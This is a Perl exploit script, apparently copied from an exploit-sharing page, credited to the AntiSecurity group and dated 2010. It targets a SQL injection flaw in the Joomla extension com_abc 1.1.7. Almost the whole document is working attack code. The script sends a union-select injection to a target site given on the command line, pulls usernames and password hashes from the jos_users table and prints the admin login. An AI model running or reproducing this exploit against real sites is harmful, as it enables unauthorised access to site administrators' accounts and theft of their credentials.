扫码分享
验证:
体验盒子#!/usr/bin/perl
#***********************************************************************#
# #
# [o] ABC Joomla Extension SQL Injection Exploit#
#Software : com_abc version 1.1.7 #
#Vendor : http://www.airiny.com/#
#Author : AntiSecurity [ NoGe Vrs-hCk OoN_BoY Paman zxvf s4va ] #
#Contact: public[at]antisecurity[dot]org#
#Home : http://antisecurity.org/#
# #
# [o] Usage #
#root@evilc0de:~# perl abc.pl www.target.com#
# #
# [o] Greetz#
#Angela Zhang stardustmemory aJe martfella pizzyroot Genex#
#H312Y yooogy mousekill }^-^{ noname matthews wishnusakti #
#skulmatic OLiBekaS ulga Cungkee k1tk4t str0ke kaka11 #
# #
# [o] April 27 2010 - GMT +07:00 Jakarta, Indonesia #
# #
#***********************************************************************#
use HTTP::Request;
use LWP::UserAgent;
my $target = $ARGV[0];
my $file_vuln = '/index.php?option=com_abc&view=abc&letter=AS§ionid=';
my $sql_query = '-null+union+select+1,group_concat(0x3a,username,0x3a,password,0x3a)+from+jos_users--';
print "\n[x]===============================================[x]\n";
print "[x]ABC Joomla Extension SQL Injection Exploit [x]\n";
print "[x][C]oded By AntiSecurity[x]\n";
print "[x]===============================================[x]\n\n";
my $exploit = "http://".$target.$file_vuln.$sql_query;
my $request = HTTP::Request->new(GET=>$exploit);
my $useragent = LWP::UserAgent->new();
$useragent->timeout(10);
my $response= $useragent->request($request);
if ($response->is_success) {
my $res = $response->content;
if ($res =~ m/:(.*):(.*):/g) {
my ($username,$password) = ($1,$2);
print "[+] $username:$password \n\n";
}
else { print "[-] Error, Fail to get admin login.\n\n"; }
}
else { print "[-] Error, ".$response->status_line."\n\n"; }
体验盒子
